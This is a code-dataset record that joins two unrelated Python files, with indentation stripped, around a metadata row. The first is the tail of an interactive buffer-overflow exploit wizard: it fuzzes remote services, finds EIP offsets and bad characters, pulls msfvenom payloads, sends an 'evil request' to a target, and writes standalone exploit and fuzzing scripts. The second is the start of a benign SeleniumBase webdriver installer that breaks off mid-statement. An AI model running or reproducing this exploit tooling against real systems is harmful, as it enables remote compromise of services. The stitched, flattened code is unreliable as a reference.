raw = ''.join(c for c in command.split('\\x'))
if command_type == 'start':
start_command = unhexlify(raw)
else:
end_command = unhexlify(raw)
else:
command = command.lstrip('"')
command = command.rstrip('"')
if command_type == 'start':
start_command = command.encode().replace(b'\\r', b'\r').replace(b'\\n', b'\n').replace(b'\\t', b'\t')
else:
end_command = command.encode().replace(b'\\r', b'\r').replace(b'\\n', b'\n').replace(b'\\t', b'\t')
# Recalc pattern length
pattern_length = pattern_length - len(start_command) - len(end_command)
def set_badchars(user_input):
"""
Adds the entered value(s) to the list of bad characters
:param user_input:
"""
global badchars
value = user_input.split(' ')[2:]
badchars.clear()
for v in value:
if bad_char_valid(v):
badchars.append(v)
else:
print_error('Could not add {} to bad characters: Invalid value'.format(v))
def set_option(user_input):
"""
Sets a parameter to given value based on the user input
:param user_input: Command with format: set parameter value
"""
global start_command
global pattern_length
global end_command
text = user_input.split(' ')
if len(text) < 3 and (text[2] != 'command' or text[2] != 'badchars'):
print_error('Invalid input. Use the following command format to set parameters: set parameter value')
return
parameter = text[1]
value = text[2]
if parameter == 'step':
set_step(value)
elif parameter == 'command':
set_command(user_input, 'start')
elif parameter == 'end_command':
set_command(user_input, 'end')
elif parameter == 'badchars':
set_badchars(user_input)
elif parameter == 'type':
if bo_type_valid(value):
global bo_type
bo_type = value
elif parameter == 'filename':
global file_name
file_name = value
elif parameter == 'fileext':
if ext_valid(value):
global file_ext
file_ext = value
elif parameter == 'target':
if ip_valid(value):
global target
target = value
elif parameter == 'lhost':
if ip_valid(value):
global connect_ip
connect_ip = value
elif parameter == 'port':
if port_valid(value):
global port
port = value
elif parameter == 'lport':
if port_valid(value):
global connect_port
connect_port = value
elif parameter == 'fuzz_length':
if number_valid(value):
global fuzz_buff_length
fuzz_buff_length = int(value)
elif parameter == 'fuzz_increase':
if number_valid(value):
global increase_step
increase_step = int(value)
elif parameter == 'fuzz_char':
if value.isalnum() and len(value) == 1:
global fuzz_char
fuzz_char = value.encode()
elif parameter == 'pattern':
if number_valid(value):
pattern_length = int(value) - len(start_command) - len(end_command)
elif parameter == 'buffer_length':
if number_valid(value):
global buf_length
buf_length = int(value)
elif parameter == 'offset':
if number_valid(value):
global offset
offset = int(value)
elif parameter == 'nop_sled':
if number_valid(value):
global nop_sled
nop_sled = int(value)
elif parameter == 'nop_padding':
if number_valid(value):
global nop_padding
nop_padding = int(value)
elif parameter == 'return':
if address_valid(value):
global return_address
return_address = struct.pack('<L', int(value, 16))
elif parameter == 'payload':
if payload_valid(value):
global payload
payload = value
create_payload()
elif parameter == 'arch':
if arch_valid(value):
global arch
arch = 'x' + value
elif parameter == 'platform':
if platform_valid(value):
global platform
platform = value
else:
print_error('Invalid parameter')
# -----------------------------------------------------------------------------
# Print options / help
# -----------------------------------------------------------------------------
def show_help():
"""
Prints all supported commands
"""
commands = [
['Command', 'Description'],
['exit / quit', 'Closes the wizard'],
['dump exploit', 'Creates an exploit file based on the current settings'],
['help', 'Shows this list with all supported commands'],
['set', 'Sets a parameter, examples: set step 3, set target 10.10.10.1'],
['show ascii', 'Shows all ASCII characters that are currently allowed in this exploit'],
['show options', 'Shows which values are currently set for all parameters'],
['show payloads',
'Shows all possible Metasploit payloads based on your settings for platform and architecture'],
['show steps', 'Shows all wizard steps and highlights the current step']
]
dash = '-' * 77
for index, value in enumerate(commands):
if index == 0:
print(BOLD, GRAY)
print('{:<15s}{:s}'.format(value[0], value[1]))
print(dash, FORMAT_END)
else:
print('{:<15s}{:s}'.format(value[0], value[1]))
print('\n')
def show_options():
"""
Prints the currently set values of all parameters
"""
dash = '-' * 77
header = ['Name', 'Current setting', 'Required', 'Description']
options = [
[
['Global parameters'],
desc_bo_type(),
desc_start_command(),
desc_end_command()
],
[
['Local buffer overflow parameters'],
desc_file_name(),
desc_file_ext()
],
[
['Remote buffer overflow parameters'],
desc_target(),
desc_port()
],
[
['Fuzzing'],
desc_fuzz_buff_length(),
desc_increase_step(),
desc_fuzz_char()
],
[
['Buffer'],
desc_pattern(),
desc_buf_length(),
desc_offset(),
desc_badchars(),
desc_nop_sled(),
desc_nop_padding(),
desc_return_address()
],
[
['Payload'],
desc_payload(),
desc_arch(),
desc_platform(),
desc_connect_ip(),
desc_connect_port()
]
]
# Header
print(BOLD, GRAY)
print('{:<15s}{:<20}{:<15s}{:<30s}'.format(header[0], header[1], header[2], header[3]))
print(dash, FORMAT_END)
# Parameters
for item in options:
for index, value in enumerate(item):
if index == 0:
print(BOLD, GRAY)
print(value[0].upper(), FORMAT_END)
else:
print('{:<15s}{:<20}{:<15s}{:<30s}'.format(value[0], value[1], value[2], value[3]))
print('\n')
def show_settings(settings):
"""
Shows parameters and their currently set values
:param settings: List with parameter descriptions to display
"""
header = ['Parameter', 'Current setting', 'Description']
print('{}{}{:<15s}{:<20}{:<30s}{}'.format(BOLD, GRAY, header[0], header[1], header[2], FORMAT_END))
for item in settings:
print('{}{:<15s}{:<20}{:<30s}{}'.format(GRAY, item[0], item[1], item[3], FORMAT_END))
print('\nIf you wish to change these settings, enter {}set <parameter> <value>{}\n'.format(BOLD, FORMAT_END))
def show_steps():
"""
Displays all steps of the wizard and marks the currently selected step
"""
print('\nThe wizard guides you through the following steps:')
steps = ['Fuzzing',
'Send pattern to find offset for EIP',
'Check offsets',
'Check bad characters',
'Check return address',
'Create payload']
for index, value in enumerate(steps):
if index == current_step:
print('{}=>[{}] {} {}'.format(CYAN, index, value, FORMAT_END))
else:
print('{} [{}] {} {}'.format(GRAY, index, value, FORMAT_END))
print('The prompt shows your current step.')
print('You can switch between steps at any time with {}set step <number>{}\n'.format(BOLD, FORMAT_END))
def show_payloads():
"""
Shows all payloads available in Metasploit based on the current values for architecture and platform
"""
tmp_file = 'payloads.txt'
command = 'msfvenom -l payloads > {}'.format(tmp_file)
thread = call_command(command)
while thread.running():
animation('Searching payloads in msfvenom')
if thread.result() == 0:
print()
with open(tmp_file, 'r') as f:
for line in f:
splitted = line.split(' ')
if len(splitted) > 5:
name = splitted[4]
if platform in name:
if arch == 'x86' and 'x64' not in name:
print(name)
elif arch == 'x64' and 'x86' not in name:
print(name)
os.unlink(tmp_file)
def show_ascii():
"""
Shows all ASCII characters in a matrix (helps finding bad chars)
"""
hexed = char_string.hex()
listed = [hexed[i:i + 2] for i in range(0, len(hexed), 2)]
cols = 16
lines = (" ".join(listed[i:i + cols]) for i in range(0, len(listed), cols))
print('\n')
print('\n'.join(lines))
# -----------------------------------------------------------------------------
# Print formatting
# -----------------------------------------------------------------------------
# Print formatted output to the console
# -----------------------------------------------------------------------------
def print_message(type, message):
types = {
'error': {'color': RED, 'sign': '!'},
'success': {'color': GREEN, 'sign': '*'},
'warning': {'color': YELLOW, 'sign': '!'},
'info': {'color': GRAY, 'sign': 'i'}
}
lines = message.split('\n')
for i in range(len(lines)):
# One line message ------------------
if len(lines) == 1:
print("{color}[{sign}] {line}{end}".format(**types[type], line=lines[i], end=FORMAT_END))
break
# Multi-line message ----------------
# First line with sign
if i == 0:
print("{color}[{sign}] {line}".format(**types[type], line=lines[i]))
# Last line with format end
elif i == len(lines) - 1:
print(" {line}{end}".format(line=lines[i], end=FORMAT_END))
# Other lines indented
else:
print(" {line}".format(line=lines[i]))
def print_error(message):
print_message('error', message)
def print_success(message):
print_message('success', message)
def print_warning(message):
print_message('warning', message)
def print_info(message):
print_message('info', message)
def show_prompt():
if current_step >= 0:
prompt = '\n{}wizard ({} | {}) >{} '.format(BLUE_BACK, bo_type, current_step, BACK_END)
else:
prompt = '\n{}wizard >{} '.format(BLUE_BACK, BACK_END)
return prompt
def show_prompt_text(text, show_lines=True):
lines = textwrap.wrap(text, width=80)
prompt_len = len(show_prompt()) - len(BLUE_BACK) - len(BACK_END)
for line in lines:
if show_lines:
print(' ' * (prompt_len - 6), '░▒▓', line)
else:
print(' ' * (prompt_len - 2), line)
def show_step_banner(title):
print(YELLOW)
print('~' * 60)
print(' ' + title)
print('~' * 60)
print(FORMAT_END)
# -----------------------------------------------------------------------------
# Threading
# -----------------------------------------------------------------------------
def animation(name):
chars = "/—\|"
for char in chars:
sys.stdout.write('\r' + name + ' in progress... ' + char)
time.sleep(.1)
sys.stdout.flush()
def threadpool(f, executor=None):
def wrap(*args, **kwargs):
return (executor or _DEFAULT_POOL).submit(f, *args, **kwargs)
return wrap
@threadpool
def call_command(command):
status = sub.call(command, stdout=sub.DEVNULL, stderr=sub.DEVNULL, shell=True)
return status
# -----------------------------------------------------------------------------
# Send and dump exploit
# -----------------------------------------------------------------------------
def run_remote_exploit():
"""
Asks the user if the remote exploit should be run automatically
"""
show_prompt_text('You can check and run the exploit file manually or press Enter to let the wizard run it.')
show_prompt_text('Enter "skip" to proceed without running the file.', False)
if get_input(check_text) == 'skip':
return
else:
send_exploit()
def send_exploit():
"""
Sends a request with the payload for a remote buffer overflow
"""
try:
with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
s.settimeout(5)
print_info('Connecting to {}'.format(target))
connect = s.connect_ex((target, port))
# Stop if connection cannot be established
if connect != 0:
print_error('Connection failed')
return
# Connection established: send request
try:
# Catch initial response if any
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
print_info('Sending evil request with {} bytes'.format(len(buffer)))
s.send(buffer)
print_success('Done')
# Stop on timeout
except so.timeout:
print_error('Connection failed due to socket timeout')
except (BrokenPipeError, ConnectionResetError):
print_error('The connection was closed while sending the payload')
def run_remote_fuzzing():
"""
Asks the user if the remote exploit should be run automatically
"""
show_prompt_text('You can check and run the fuzzing file manually or press Enter to let the wizard run it.')
show_prompt_text('Enter "skip" to proceed without running the file.', False)
if get_input(check_text) == 'skip':
return
else:
send_fuzzing()
print_info('Fuzzing finished')
def send_fuzzing():
"""
Sends requests with increasing payloads to cause a remote buffer overflow
"""
build_fuzz_buffer()
try:
for item in fuzz_buffer:
with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
s.settimeout(5)
print_info('Connecting to ' + target)
connect = s.connect_ex((target, port))
# Stop if connection cannot be established
if connect != 0:
print_error('Connection failed')
return
# Connection established: send request
try:
# Catch initial response if any
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
command = start_command + item + end_command
print_info('Fuzzing with {} bytes'.format(len(command)))
s.send(command)
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
print_success('Done')
# Stop on timeout
except so.timeout:
print_error('Connection failed due to socket timeout.')
return
except (BrokenPipeError, ConnectionResetError):
print_error('The connection was closed while sending the payload')
def dump_local_exploit():
"""
Creates a file with the payload for a local buffer overflow
"""
global file
global buffer
try:
with open(file, 'wb') as f:
f.write(buffer)
print_success('Created / modified file with length {}'.format(len(buffer)))
except OSError as ex:
print_error('Error while creating the exploit file:\n {}'.format(ex.strerror))
def dump_remote_exploit():
"""
Writes a python file with the exploit based on the currently set parameters
"""
global file
content = """\
#!/usr/bin/python3
import socket as so
# --- Define target ------------------------
target = '{target}'
port = {port}
# ------------------------------------------
# --- Define exploit ------------------------
buf_length = {buffer_length}
offset = {off}
{buffer_code}
# ------------------------------------------
with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
try:
s.settimeout(5)
print(' [*] Connecting to', target)
connect = s.connect_ex((target, port))
# Stop script if connection cannot be established
if connect != 0:
print('[!] Connection failed')
exit(1)
# Connection established: send request
try:
# Catch initial response if any
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
print(' [*] Sending evil request with', len(buffer), 'bytes')
s.send(buffer)
print('[*] Done')
# Stop on timeout
except so.timeout:
print('[!] Connection failed due to socket timeout.')
exit(1)
except (BrokenPipeError, ConnectionResetError):
print('[!] The connection was closed while sending the payload')
""".format(target=target,
port=port,
buffer_length=buf_length,
off=offset,
buffer_code=buffer_list.selected_buffer.print_buffer())
try:
with open(file, 'wb') as f:
f.write(content.encode())
print_success('Created exploit file {}'.format(file))
except OSError as ex:
print_error('Error while creating the exploit file:\n {}'.format(ex.strerror))
def update_remote_exploit():
"""
Updates only the buffer in an existing exploit file.
Manual changes in other parts of the file will be retained.
"""
try:
with FileInput(files=[file], inplace=True) as f:
for line in f:
line = line.rstrip()
if line.startswith('offset = '):
line = "offset = " + str(offset)
elif line.startswith('buffer = '):
line = buffer_list.selected_buffer.print_buffer()
elif line.startswith('buffer += ') or len(line) == 0:
continue
print(line)
print_success('Updated buffer in exploit file {}'.format(file))
except OSError as ex:
print_error('Error while updating the exploit file:\n {}'.format(ex.strerror))
def build_fuzz_buffer():
"""
Generates the buffer for fuzzing based on the currently set parameters for
fuzz_length, fuzz_increase and fuzz_char
"""
counter = increase_step - len(start_command) - len(end_command)
while len(fuzz_buffer) <= fuzz_buff_length:
fuzz_buffer.append(fuzz_char * counter)
counter = counter + increase_step
def dump_local_fuzz():
"""
Writes files with increasing size for fuzzing
"""
build_fuzz_buffer()
# Create files
for item in fuzz_buffer:
filename = file_name + '_' + str(len(item)) + '.' + file_ext
with open(filename, 'wb') as f:
f.write(start_command + item + end_command)
print_info('Created fuzzing file with length ' + str(len(item)))
def dump_remote_fuzz():
"""
Writes a python file for fuzzing based on the currently set parameters for fuzz_length, fuzz_increase and fuzz_char
"""
filename = 'fuzzing.py'
content = '''\
#!/usr/bin/python3
import socket as so
# --- Define target ------------------------
target = '{target}'
port = {port}
# ------------------------------------------
# --- Build fuzzing buffer -----------------
fuzz_buffer = []
counter = {step} - len({cmd}) - len({ecmd})
while len(fuzz_buffer) <= {buff_len}:
fuzz_buffer.append({char}*counter)
counter = counter + {step}
# ------------------------------------------
for item in fuzz_buffer:
with so.socket(so.AF_INET, so.SOCK_STREAM) as s:
try:
s.settimeout(5)
print(' [*] Connecting to', target)
connect = s.connect_ex((target, port))
# Stop script if connection cannot be established
if connect != 0:
print('[!] Connection failed')
exit(1)
# Connection established: send request
try:
# Catch initial response if any
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
command = {cmd} + item + {ecmd}
print(' [*] Fuzzing with', len(command), 'bytes')
s.send(command)
try:
print('[*] Received response: ' + str(s.recv(1024)))
except so.timeout:
pass
print('[*] Done')
# Stop on timeout
except so.timeout:
print('[!] Connection failed due to socket timeout.')
exit(1)
except (BrokenPipeError, ConnectionResetError):
print('[!] The connection was closed while sending the payload')
exit(1)
'''.format(target=target,
port=port,
step=increase_step,
buff_len=fuzz_buff_length,
char=fuzz_char,
cmd=start_command,
ecmd=end_command)
try:
with open(filename, 'w') as f:
f.write(content)
print_success('Created fuzzing file {}'.format(filename))
except OSError as ex:
print_error('Error while creating the fuzzing file:\n {}'.format(ex.strerror))
###############################################################################
# Start wizard
###############################################################################
if __name__ == '__main__':
if not check_dependencies():
exit(1)
# Intro
print_welcome()
show_steps()
# Walk through steps or let user work freely
show_prompt_text(
'Enter {}start{} to walk through the wizard step by step or make your settings manually.'.format(BOLD,
FORMAT_END))
show_prompt_text('Enter {}show help{} to get help.'.format(BOLD, FORMAT_END))
start_input = get_input(intro_valid)
if start_input == 'start':
select_bo_type()
# Walk through steps
start_steps()
else:
# Show prompt till exit
get_input(generic_check)
| 30.59147
| 154
| 0.652988
|
4a112b5c42be07dc5596f4fc5c0af76bbb7e2cf5
| 21,837
|
py
|
Python
|
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
seleniumbase/console_scripts/sb_install.py
|
gourav-iquanti/SeleniumBase
|
420b6cc7b843f85e6efdc3eb90943b356e11b355
|
[
"MIT"
] | null | null | null |
"""
Installs the specified web driver.
Usage:
seleniumbase install {chromedriver|geckodriver|edgedriver|
iedriver|operadriver} [OPTIONS]
Options:
VERSION Specify the version.
(Default chromedriver version = 2.44)
Use "latest" for the latest version.
-p OR --path Also copy the driver to /usr/local/bin
Example:
seleniumbase install chromedriver
seleniumbase install geckodriver
seleniumbase install edgedriver
seleniumbase install chromedriver 83.0.4103.39
seleniumbase install chromedriver latest
seleniumbase install chromedriver -p
seleniumbase install chromedriver latest -p
seleniumbase install edgedriver 79.0.309.65
Output:
Installs the chosen webdriver to seleniumbase/drivers/
(chromedriver is required for Chrome automation)
(geckodriver is required for Firefox automation)
(edgedriver is required for MS Edge automation)
(iedriver is required for Internet Explorer automation)
(operadriver is required for Opera Browser automation)
"""
import os
import platform
import requests
import shutil
import sys
import tarfile
import urllib3
import zipfile
from seleniumbase import drivers # webdriver storage folder for SeleniumBase
urllib3.disable_warnings()
DRIVER_DIR = os.path.dirname(os.path.realpath(drivers.__file__))
LOCAL_PATH = "/usr/local/bin/" # On Mac and Linux systems
DEFAULT_CHROMEDRIVER_VERSION = "2.44"
DEFAULT_GECKODRIVER_VERSION = "v0.26.0"
DEFAULT_EDGEDRIVER_VERSION = "84.0.522.52"
DEFAULT_OPERADRIVER_VERSION = "v.81.0.4044.113"
def invalid_run_command():
exp = (" ** install **\n\n")
exp += " Usage:\n"
exp += " seleniumbase install [DRIVER_NAME] [OPTIONS]\n"
exp += " (Drivers: chromedriver, geckodriver, edgedriver,\n"
exp += " iedriver, operadriver)\n"
exp += " Options:\n"
exp += " VERSION Specify the version.\n"
exp += " (Default chromedriver version = 2.44)\n"
exp += ' Use "latest" for the latest version.\n'
exp += " -p OR --path Also copy the driver to /usr/local/bin\n"
exp += " Example:\n"
exp += " seleniumbase install chromedriver\n"
exp += " seleniumbase install geckodriver\n"
exp += " seleniumbase install chromedriver 76.0.3809.126\n"
exp += " seleniumbase install chromedriver latest\n"
exp += " seleniumbase install chromedriver -p\n"
exp += " seleniumbase install chromedriver latest -p\n"
exp += " Output:\n"
exp += " Installs the chosen webdriver to seleniumbase/drivers/\n"
exp += " (chromedriver is required for Chrome automation)\n"
exp += " (geckodriver is required for Firefox automation)\n"
exp += " (edgedriver is required for Microsoft Edge automation)\n"
exp += " (iedriver is required for InternetExplorer automation)\n"
exp += " (operadriver is required for Opera Browser automation)\n"
print("")
raise Exception('INVALID RUN COMMAND!\n\n%s' % exp)
def make_executable(file_path):
# Set permissions to: "If you can read it, you can execute it."
mode = os.stat(file_path).st_mode
mode |= (mode & 0o444) >> 2 # copy R bits to X
os.chmod(file_path, mode)
def main(override=None):
if override == "chromedriver":
sys.argv = ["seleniumbase", "install", "chromedriver"]
elif override == "edgedriver":
sys.argv = ["seleniumbase", "install", "edgedriver"]
elif override == "geckodriver":
sys.argv = ["seleniumbase", "install", "geckodriver"]
num_args = len(sys.argv)
if sys.argv[0].split('/')[-1].lower() == "seleniumbase" or (
sys.argv[0].split('\\')[-1].lower() == "seleniumbase") or (
sys.argv[0].split('/')[-1].lower() == "sbase") or (
sys.argv[0].split('\\')[-1].lower() == "sbase"):
if num_args < 3 or num_args > 5:
invalid_run_command()
else:
invalid_run_command()
name = sys.argv[2].lower()
file_name = None
download_url = None
downloads_folder = DRIVER_DIR
sys_plat = sys.platform
expected_contents = None
platform_code = None
inner_folder = None
copy_to_path = False
use_version = ""
new_file = ""
f_name = ""
if name == "chromedriver":
use_version = DEFAULT_CHROMEDRIVER_VERSION
get_latest = False
if num_args == 4 or num_args == 5:
if "-p" not in sys.argv[3].lower():
use_version = sys.argv[3]
if use_version.lower() == "latest":
get_latest = True
else:
copy_to_path = True
if num_args == 5:
if "-p" in sys.argv[4].lower():
copy_to_path = True
else:
invalid_run_command()
if "darwin" in sys_plat:
file_name = "chromedriver_mac64.zip"
elif "linux" in sys_plat:
file_name = "chromedriver_linux64.zip"
elif "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
file_name = "chromedriver_win32.zip" # Works for win32 / win_x64
else:
raise Exception("Cannot determine which version of chromedriver "
"to download!")
found_chromedriver = False
if get_latest:
last = "http://chromedriver.storage.googleapis.com/LATEST_RELEASE"
url_request = requests.get(last)
if url_request.ok:
found_chromedriver = True
use_version = url_request.text
download_url = ("http://chromedriver.storage.googleapis.com/"
"%s/%s" % (use_version, file_name))
url_request = None
if not found_chromedriver:
url_request = requests.get(download_url)
if found_chromedriver or url_request.ok:
print("\n* chromedriver version for download = %s" % use_version)
else:
raise Exception("Could not find chromedriver to download!\n")
elif name == "geckodriver" or name == "firefoxdriver":
use_version = DEFAULT_GECKODRIVER_VERSION
if "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
use_version = "v0.24.0"
found_geckodriver = False
if num_args == 4 or num_args == 5:
if "-p" not in sys.argv[3].lower():
use_version = sys.argv[3]
if use_version.lower() == "latest":
last = ("https://api.github.com/repos/"
"mozilla/geckodriver/releases/latest")
url_request = requests.get(last)
if url_request.ok:
found_geckodriver = True
use_version = url_request.json()["tag_name"]
else:
use_version = DEFAULT_GECKODRIVER_VERSION
else:
copy_to_path = True
if num_args == 5:
if "-p" in sys.argv[4].lower():
copy_to_path = True
else:
invalid_run_command()
if "darwin" in sys_plat:
file_name = "geckodriver-%s-macos.tar.gz" % use_version
elif "linux" in sys_plat:
arch = platform.architecture()[0]
if "64" in arch:
file_name = "geckodriver-%s-linux64.tar.gz" % use_version
else:
file_name = "geckodriver-%s-linux32.tar.gz" % use_version
elif "win32" in sys_plat or "win64" in sys_plat or "x64" in sys_plat:
file_name = "geckodriver-%s-win64.zip" % use_version
else:
raise Exception("Cannot determine which version of geckodriver "
"(Firefox Driver) to download!")
download_url = ("https://github.com/mozilla/geckodriver/"
"releases/download/"
"%s/%s" % (use_version, file_name))
url_request = None
if not found_geckodriver:
url_request = requests.get(download_url)
if found_geckodriver or url_request.ok:
print("\n* geckodriver version for download = %s" % use_version)
else:
raise Exception("\nCould not find the specified geckodriver "
"version to download!\n")
elif name == "edgedriver" or name == "msedgedriver":
name = "edgedriver"
use_version = DEFAULT_EDGEDRIVER_VERSION
if num_args == 4 or num_args == 5:
if "-p" not in sys.argv[3].lower():
use_version = sys.argv[3]
if use_version.lower() == "latest":
use_version = DEFAULT_EDGEDRIVER_VERSION
else:
copy_to_path = True
if num_args == 5:
if "-p" in sys.argv[4].lower():
copy_to_path = True
else:
invalid_run_command()
if "win64" in sys_plat or "x64" in sys_plat:
file_name = "edgedriver_win64.zip"
elif "win32" in sys_plat or "x86" in sys_plat:
file_name = "edgedriver_win32.zip"
elif "darwin" in sys_plat:
file_name = "edgedriver_mac64.zip"
else:
raise Exception("Sorry! Microsoft WebDriver / EdgeDriver is "
"only for Windows or Mac operating systems!")
download_url = ("https://msedgedriver.azureedge.net/"
"%s/%s" % (use_version, file_name))
elif name == "iedriver":
major_version = "3.14"
full_version = "3.14.0"
use_version = full_version
if "win32" in sys_plat:
file_name = "IEDriverServer_Win32_%s.zip" % full_version
elif "win64" in sys_plat or "x64" in sys_plat:
file_name = "IEDriverServer_x64_%s.zip" % full_version
else:
raise Exception("Sorry! IEDriver is only for "
"Windows-based operating systems!")
download_url = ("http://selenium-release.storage.googleapis.com/"
"%s/%s" % (major_version, file_name))
elif name == "operadriver" or name == "operachromiumdriver":
name = "operadriver"
use_version = DEFAULT_OPERADRIVER_VERSION
get_latest = False
if num_args == 4 or num_args == 5:
if "-p" not in sys.argv[3].lower():
use_version = sys.argv[3]
if use_version.lower() == "latest":
use_version = DEFAULT_OPERADRIVER_VERSION
else:
copy_to_path = True
if num_args == 5:
if "-p" in sys.argv[4].lower():
copy_to_path = True
else:
invalid_run_command()
if "darwin" in sys_plat:
file_name = "operadriver_mac64.zip"
platform_code = "mac64"
inner_folder = "operadriver_%s/" % platform_code
expected_contents = (['operadriver_mac64/',
'operadriver_mac64/operadriver',
'operadriver_mac64/sha512_sum'])
elif "linux" in sys_plat:
file_name = "operadriver_linux64.zip"
platform_code = "linux64"
inner_folder = "operadriver_%s/" % platform_code
expected_contents = (['operadriver_linux64/',
'operadriver_linux64/operadriver',
'operadriver_linux64/sha512_sum'])
elif "win32" in sys_plat:
file_name = "operadriver_win32.zip"
platform_code = "win32"
inner_folder = "operadriver_%s/" % platform_code
expected_contents = (['operadriver_win32/',
'operadriver_win32/operadriver.exe',
'operadriver_win32/sha512_sum'])
elif "win64" in sys_plat or "x64" in sys_plat:
file_name = "operadriver_win64.zip"
platform_code = "win64"
inner_folder = "operadriver_%s/" % platform_code
expected_contents = (['operadriver_win64/',
'operadriver_win64/operadriver.exe',
'operadriver_win64/sha512_sum'])
else:
raise Exception("Cannot determine which version of Operadriver "
"to download!")
download_url = ("https://github.com/operasoftware/operachromiumdriver/"
"releases/download/"
"%s/%s" % (use_version, file_name))
else:
invalid_run_command()
if file_name is None or download_url is None:
invalid_run_command()
file_path = downloads_folder + '/' + file_name
if not os.path.exists(downloads_folder):
os.mkdir(downloads_folder)
print('\nDownloading %s from:\n%s ...' % (file_name, download_url))
remote_file = requests.get(download_url)
with open(file_path, 'wb') as file:
file.write(remote_file.content)
print('Download Complete!\n')
if file_name.endswith(".zip"):
zip_file_path = file_path
zip_ref = zipfile.ZipFile(zip_file_path, 'r')
contents = zip_ref.namelist()
if len(contents) == 1:
if name == "operadriver":
raise Exception("Zip file for OperaDriver is missing content!")
for f_name in contents:
# Remove existing version if exists
new_file = downloads_folder + '/' + str(f_name)
if "Driver" in new_file or "driver" in new_file:
if os.path.exists(new_file):
os.remove(new_file) # Technically the old file now
print('Extracting %s from %s ...' % (contents, file_name))
zip_ref.extractall(downloads_folder)
zip_ref.close()
os.remove(zip_file_path)
print('Unzip Complete!\n')
for f_name in contents:
new_file = downloads_folder + '/' + str(f_name)
print("The file [%s] was saved to:\n%s\n" % (f_name, new_file))
print("Making [%s %s] executable ..." % (f_name, use_version))
make_executable(new_file)
print("[%s] is now ready for use!" % f_name)
if copy_to_path and os.path.exists(LOCAL_PATH):
path_file = LOCAL_PATH + f_name
shutil.copyfile(new_file, path_file)
make_executable(path_file)
print("Also copied to: %s" % path_file)
print("")
elif name == "edgedriver" or name == "msedgedriver":
if "darwin" in sys_plat or "linux" in sys_plat:
# Was expecting to be on a Windows OS at this point
raise Exception("Unexpected file format for msedgedriver!")
expected_contents = (['Driver_Notes/',
'Driver_Notes/credits.html',
'Driver_Notes/LICENSE',
'msedgedriver.exe'])
if len(contents) > 4:
raise Exception("Unexpected content in EdgeDriver Zip file!")
for content in contents:
if content not in expected_contents:
raise Exception("Expected file [%s] missing from [%s]" % (
content, expected_contents))
# Zip file is valid. Proceed.
driver_path = None
driver_file = None
for f_name in contents:
print(f_name)
# Remove existing version if exists
str_name = str(f_name)
new_file = downloads_folder + '/' + str_name
if str_name == "msedgedriver.exe":
driver_file = str_name
driver_path = new_file
if os.path.exists(new_file):
os.remove(new_file)
if not driver_file or not driver_path:
raise Exception("Operadriver missing from Zip file!")
print('Extracting %s from %s ...' % (contents, file_name))
zip_ref.extractall(downloads_folder)
zip_ref.close()
os.remove(zip_file_path)
print('Unzip Complete!\n')
to_remove = (['%s/Driver_Notes/credits.html' % downloads_folder,
'%s/Driver_Notes/LICENSE' % downloads_folder])
for file_to_remove in to_remove:
if os.path.exists(file_to_remove):
os.remove(file_to_remove)
if os.path.exists(downloads_folder + '/' + "Driver_Notes/"):
# Only works if the directory is empty
os.rmdir(downloads_folder + '/' + "Driver_Notes/")
print("The file [%s] was saved to:\n%s\n" % (
driver_file, driver_path))
print("Making [%s %s] executable ..." % (driver_file, use_version))
make_executable(driver_path)
print("[%s] is now ready for use!" % driver_file)
print("")
elif name == "operadriver":
if len(contents) > 3:
raise Exception("Unexpected content in OperaDriver Zip file!")
# Zip file is valid. Proceed.
driver_path = None
driver_file = None
for f_name in contents:
# Remove existing version if exists
str_name = str(f_name).split(inner_folder)[1]
new_file = downloads_folder + '/' + str_name
if str_name == "operadriver" or str_name == "operadriver.exe":
driver_file = str_name
driver_path = new_file
if os.path.exists(new_file):
os.remove(new_file)
if not driver_file or not driver_path:
raise Exception("Operadriver missing from Zip file!")
print('Extracting %s from %s ...' % (contents, file_name))
zip_ref.extractall(downloads_folder)
zip_ref.close()
os.remove(zip_file_path)
print('Unzip Complete!\n')
inner_driver = downloads_folder + '/' + inner_folder + driver_file
inner_sha = downloads_folder + '/' + inner_folder + "sha512_sum"
shutil.copyfile(inner_driver, driver_path)
print("The file [%s] was saved to:\n%s\n" % (
driver_file, driver_path))
print("Making [%s %s] executable ..." % (driver_file, use_version))
make_executable(driver_path)
print("[%s] is now ready for use!" % driver_file)
if copy_to_path and os.path.exists(LOCAL_PATH):
path_file = LOCAL_PATH + driver_file
shutil.copyfile(driver_path, path_file)
make_executable(path_file)
print("Also copied to: %s" % path_file)
# Clean up extra files
if os.path.exists(inner_driver):
os.remove(inner_driver)
if os.path.exists(inner_sha):
os.remove(inner_sha)
if os.path.exists(downloads_folder + '/' + inner_folder):
# Only works if the directory is empty
os.rmdir(downloads_folder + '/' + inner_folder)
print("")
elif len(contents) == 0:
raise Exception("Zip file %s is empty!" % zip_file_path)
else:
raise Exception("Expecting only one file in %s!" % zip_file_path)
elif file_name.endswith(".tar.gz"):
tar_file_path = file_path
tar = tarfile.open(file_path)
contents = tar.getnames()
if len(contents) == 1:
for f_name in contents:
# Remove existing version if exists
new_file = downloads_folder + '/' + str(f_name)
if "Driver" in new_file or "driver" in new_file:
if os.path.exists(new_file):
os.remove(new_file) # Technically the old file now
print('Extracting %s from %s ...' % (contents, file_name))
tar.extractall(downloads_folder)
tar.close()
os.remove(tar_file_path)
print('Unzip Complete!\n')
for f_name in contents:
new_file = downloads_folder + '/' + str(f_name)
print("The file [%s] was saved to:\n%s\n" % (f_name, new_file))
print("Making [%s %s] executable ..." % (f_name, use_version))
make_executable(new_file)
print("[%s] is now ready for use!" % f_name)
if copy_to_path and os.path.exists(LOCAL_PATH):
path_file = LOCAL_PATH + f_name
